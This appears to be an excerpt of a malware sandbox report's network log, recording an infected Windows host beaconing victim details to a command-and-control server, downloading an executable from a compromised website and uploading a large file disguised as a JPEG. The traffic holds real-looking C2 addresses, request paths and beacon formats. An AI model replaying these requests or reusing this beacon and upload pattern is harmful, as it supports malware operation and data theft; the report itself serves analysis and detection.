72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f 
dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 6f fc 12 17 f6 1d ff 00 82 90 7e cd
Data Ascii: --152138533219.jpg
Content-Disposition: form-data; name="data"; filename="152138533219.jpg"
Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
193 | 192.168.2.4 | 49861 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:41.784513950 CEST | 6191 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
194 | 176.111.174.114 | 80 | 192.168.2.4 | 49861 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:41.882316113 CEST | 6245 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:41 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
195 | 192.168.2.4 | 49863 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:42.098555088 CEST | 6386 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
196 | 176.111.174.114 | 80 | 192.168.2.4 | 49860 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:42.165818930 CEST | 6406 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:41 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
197 | 176.111.174.114 | 80 | 192.168.2.4 | 49863 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:42.203804970 CEST | 6418 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:42 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
198 | 192.168.2.4 | 49864 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:42.403166056 CEST | 6419 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
199 | 176.111.174.114 | 80 | 192.168.2.4 | 49864 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:42.499996901 CEST | 6420 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:42 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49744 | 89.184.92.210 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:58:52.372241020 CEST | 4021 | OUT | GET /wp-content/themes/cinestar/extendvc/xsrv2.exe HTTP/1.1
                                                                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                          Host: ukedocumentary.com
                                                                                                                                          Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
20 | 192.168.2.4 | 49758 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:12.426002026 CEST | 4531 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
200 | 192.168.2.4 | 49866 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:42.712897062 CEST | 6420 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
201 | 176.111.174.114 | 80 | 192.168.2.4 | 49866 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:42.821469069 CEST | 6421 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:42 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
202 | 192.168.2.4 | 49867 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:43.036272049 CEST | 6422 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
203 | 176.111.174.114 | 80 | 192.168.2.4 | 49867 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:43.137773991 CEST | 6451 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:43 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                                                                                                                                          204   192.168.2.4   49868   176.111.174.114   80   C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp   kBytes transferred   Direction   Data
                                                                                                                                          Apr 28, 2021 22:59:43.346451044 CEST   6459   OUT   POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                                                                                                                                          205   176.111.174.114   80   192.168.2.4   49868   C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp   kBytes transferred   Direction   Data
                                                                                                                                          Apr 28, 2021 22:59:43.448180914 CEST   6460   IN   HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:43 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                                                                                                                                          206   192.168.2.4   49870   176.111.174.114   80   C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp   kBytes transferred   Direction   Data
                                                                                                                                          Apr 28, 2021 22:59:43.661226988 CEST   6460   OUT   POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                                                                                                                                          207   176.111.174.114   80   192.168.2.4   49870   C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp   kBytes transferred   Direction   Data
                                                                                                                                          Apr 28, 2021 22:59:43.765486956 CEST   6461   IN   HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:43 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                                                                                                                                          208   192.168.2.4   49871   176.111.174.114   80   C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp   kBytes transferred   Direction   Data
                                                                                                                                          Apr 28, 2021 22:59:43.978337049 CEST   6461   OUT   POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                                                                                                                                          209   176.111.174.114   80   192.168.2.4   49871   C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp   kBytes transferred   Direction   Data
                                                                                                                                          Apr 28, 2021 22:59:44.082300901 CEST   6462   IN   HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:44 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                                                                                                                                          21   176.111.174.114   80   192.168.2.4   49758   C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp   kBytes transferred   Direction   Data
                                                                                                                                          Apr 28, 2021 22:59:12.529751062 CEST   4531   IN   HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:12 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                                                                                                                                          210   192.168.2.4   49872   176.111.174.114   80   C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp   kBytes transferred   Direction   Data
                                                                                                                                          Apr 28, 2021 22:59:44.282030106 CEST   6462   OUT   POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                                                                                                                                          211   176.111.174.114   80   192.168.2.4   49872   C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp   kBytes transferred   Direction   Data
                                                                                                                                          Apr 28, 2021 22:59:44.382854939 CEST   6463   IN   HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:44 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                                                                                                                                          212   192.168.2.4   49873   176.111.174.114   80   C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp   kBytes transferred   Direction   Data
                                                                                                                                          Apr 28, 2021 22:59:44.596575975 CEST   6463   OUT   POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                                                                                                                                          213   176.111.174.114   80   192.168.2.4   49873   C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp   kBytes transferred   Direction   Data
                                                                                                                                          Apr 28, 2021 22:59:44.695749044 CEST   6464   IN   HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:44 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                                                                                                                                          214   192.168.2.4   49874   176.111.174.114   80   C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp   kBytes transferred   Direction   Data
                                                                                                                                          Apr 28, 2021 22:59:44.905251980 CEST   6465   OUT   POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                                                                                                                                          215   192.168.2.4   49875   176.111.174.114   80   C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp   kBytes transferred   Direction   Data
                                                                                                                                          Apr 28, 2021 22:59:44.929976940 CEST   6478   OUT   POST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227184
